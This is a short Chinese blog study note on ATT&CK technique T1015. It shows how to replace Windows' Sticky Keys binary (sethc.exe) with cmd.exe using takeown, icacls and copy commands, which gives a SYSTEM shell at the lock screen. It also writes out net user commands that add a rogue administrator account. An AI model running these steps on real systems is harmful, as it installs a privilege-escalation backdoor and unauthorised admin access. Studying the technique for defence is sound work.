T1015- Accessibility Features
作者:互联网
Windows为特殊人士设计了轻松访问功能,比如放大镜、讲述人、粘滞键等等。利用轻松访问功能里的某些特性,可以完成提权和驻留。
一、粘滞键 Sticky Keys
粘滞键是为了方便某些人不方便同时按键的电脑使用者使用windows 快捷键,启动粘滞键后,按Ctrl+Alt+Del就可以每次按一个键。
启动粘滞键的方式是连按5次shift键,即使是锁屏的情况下也可以;而且,在锁屏状态下是以system权限启动sethc.exe的。
1. 替换sethc.exe
将sethc.exe替换成cmd.exe,就可以实现提权和驻留,但sethc.exe的owner是TrustInstaller,Administrators组也没有写权限。
因此先使用takeown将owner改为当前用户,这样就有修改权限了, 再授予Administrators组Full Conrol权限。
C:\Windows\system32>takeown.exe /F c:\Windows\System32\sethc.exe SUCCESS: The file (or folder): "c:\Windows\System32\sethc.exe" now owned by user "RING\win10". C:\Windows\system32>icacls c:\Windows\System32\sethc.exe /grant Administrators:F processed file: c:\Windows\System32\sethc.exe Successfully processed 1 files; Failed processing 0 files
此时再copy就没有问题了
C:\Windows\system32>copy cmd.exe sethc.exe /y
1 file(s) copied.
2. 使用后门
连按5次shift启动cmd.exe, 锁屏状态下是以system权限启动的 !!!
能做的操作有很多,比如添加新用户
net user test Password123 /add net localgroup administrators test /add
不过网络攻击中怎么满足锁屏状态下按5次shift键呢??? 似乎可用性不是很强
3. 命令备注:
takeown /F X:\FULL_PATH_TO_FOLDER
icacls X:\FULL_PATH_TO_FOLDER /grant Administrators:F
# 作用到子文件及子文件夹
takeown /F X:\FULL_PATH_TO_FOLDER /r /d y icacls X:\FULL_PATH_TO_FOLDER /grant Administrators:F /t
参考:
https://thegeekpage.com/solved-failed-to-enumerate-objects-in-the-container-windows-10-error/
https://www.cnblogs.com/BOHB-yunying/p/11695140.html
标签:exe,Features,Windows,T1015,Accessibility,Administrators,FULL,粘滞,sethc 来源: https://www.cnblogs.com/ring-lcy/p/12542583.html